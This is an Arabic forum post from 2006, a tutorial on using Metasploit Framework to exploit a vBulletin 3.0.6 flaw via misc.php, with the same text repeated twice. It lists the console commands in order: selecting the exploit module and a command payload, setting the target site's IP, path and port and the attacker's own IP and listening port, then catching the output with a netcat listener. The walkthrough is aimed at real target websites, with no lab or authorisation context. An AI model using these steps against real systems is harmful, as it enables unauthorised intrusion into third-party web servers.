Mostafa Megahed
2006/12/7, 3:13 AM
كيفكم ياجماعه حنشرح برنامج Metasploit Framework لاستثمار الثغرات
زيه زي البيرل لان فيه ثغرات مكتوبه Framework ركزو معايه
اول حاجه حمل البرنامج من هنا
حمل على بركة الله (http://metasploit.com/tools/framework-2.4.exe)
روح لمكان البرنامج
C:\Program Files\Metasploit Framework
واضغط على ايقونه البرنامج الموضح بالصوره
http://www.alsakr.com/vb/uploaded/msf.jpg
وبعد ماتضغط على الايقونه البرنامج حاتفتح معك الشاشه
http://www.alsakr.com/vb/uploaded/msf1.jpg
ونضع ملف الثغره في
C:\Program Files\Metasploit Framework\home\framework\exploits
مع ملاحظه كاتكون بمتداد ((( pm )))
http://www.alsakr.com/vb/uploaded/msf2.jpg
طبعا ممكن تفتح الملف وبتلاحظ الاسن بتاع الثغره بالاعلى الاكسبلويت
http://www.alsakr.com/vb/uploaded/msf3.jpg
للتشغيل الثغره اكتب الامر زي ما هو
use php_vb3_0_6
http://www.alsakr.com/vb/uploaded/msf4.jpg
طيب حنستعرض الخيارات المتاحه لنا للتطبيق بالامر
show payloads
http://www.alsakr.com/vb/uploaded/msf5.jpg
ظهر لنا الخيارات وحنختار منها cmd_generic بالامر
set PAYLOAD cmd_generic
http://www.alsakr.com/vb/uploaded/msf6.jpg
طيب حنشوف الخيارات اللتي بداخل الخيار بالامر
show options
http://www.alsakr.com/vb/uploaded/msf7.jpg
حلوجدا,,,,,, نستخدم الخيارات بالترتيب بالاوامر
set RHOST server's IP
server's IP <<--------------اي بي الموقع المستهدف
set RPATH /vb/misc.php
vb/misc.php<<-------------مكان الاصابه وهو متغير
وايضا الامر
set RPORT 80
وبعده الامر
set LHOST myIP
myIP<<-------------- الاي بي بتاعك
وايضا الامر
set LPORT 1234
والبورت انت حر ممكن تغسره بس لازم هو نفسه عند الاتصال بالنت كات
والان استخدم اوامر اللينكس بالامر
set CMD id
والان شوفوا الصوره عند استخدام الاوامر
http://www.alsakr.com/vb/uploaded/msf8.jpg
الان روح وافتح النت كات ونتنصت بيه بالامر
nc -vv -l -p 1234
لاحظو البورت هو نفسه اللي بالاول وضعناه
واخيرا نستخدم الامر
exploit
http://www.alsakr.com/vb/uploaded/msf9.jpg
وانتظر,,,,,حتظهر النتيجه بالنت كات
طبعا الشرح كله كافتراضي للتطبيق على احد الثغرات
المهم نفهم طريقة التطبيق لان فيه ثغرات جميله مكتوبه بالــFramework
والسلام عليكم
زيه زي البيرل لان فيه ثغرات مكتوبه Framework ركزو معايه
اول حاجه حمل البرنامج من هنا
حمل على بركة الله (http://metasploit.com/tools/framework-2.4.exe)
روح لمكان البرنامج
C:\Program Files\Metasploit Framework
واضغط على ايقونه البرنامج الموضح بالصوره
http://www.alsakr.com/vb/uploaded/msf.jpg
وبعد ماتضغط على الايقونه البرنامج حاتفتح معك الشاشه
http://www.alsakr.com/vb/uploaded/msf1.jpg
ونضع ملف الثغره في
C:\Program Files\Metasploit Framework\home\framework\exploits
مع ملاحظه كاتكون بمتداد ((( pm )))
http://www.alsakr.com/vb/uploaded/msf2.jpg
طبعا ممكن تفتح الملف وبتلاحظ الاسن بتاع الثغره بالاعلى الاكسبلويت
http://www.alsakr.com/vb/uploaded/msf3.jpg
للتشغيل الثغره اكتب الامر زي ما هو
use php_vb3_0_6
http://www.alsakr.com/vb/uploaded/msf4.jpg
طيب حنستعرض الخيارات المتاحه لنا للتطبيق بالامر
show payloads
http://www.alsakr.com/vb/uploaded/msf5.jpg
ظهر لنا الخيارات وحنختار منها cmd_generic بالامر
set PAYLOAD cmd_generic
http://www.alsakr.com/vb/uploaded/msf6.jpg
طيب حنشوف الخيارات اللتي بداخل الخيار بالامر
show options
http://www.alsakr.com/vb/uploaded/msf7.jpg
حلوجدا,,,,,, نستخدم الخيارات بالترتيب بالاوامر
set RHOST server's IP
server's IP <<--------------اي بي الموقع المستهدف
set RPATH /vb/misc.php
vb/misc.php<<-------------مكان الاصابه وهو متغير
وايضا الامر
set RPORT 80
وبعده الامر
set LHOST myIP
myIP<<-------------- الاي بي بتاعك
وايضا الامر
set LPORT 1234
والبورت انت حر ممكن تغسره بس لازم هو نفسه عند الاتصال بالنت كات
والان استخدم اوامر اللينكس بالامر
set CMD id
والان شوفوا الصوره عند استخدام الاوامر
http://www.alsakr.com/vb/uploaded/msf8.jpg
الان روح وافتح النت كات ونتنصت بيه بالامر
nc -vv -l -p 1234
لاحظو البورت هو نفسه اللي بالاول وضعناه
واخيرا نستخدم الامر
exploit
http://www.alsakr.com/vb/uploaded/msf9.jpg
وانتظر,,,,,حتظهر النتيجه بالنت كات
طبعا الشرح كله كافتراضي للتطبيق على احد الثغرات
المهم نفهم طريقة التطبيق لان فيه ثغرات جميله مكتوبه بالــFramework
والسلام عليكم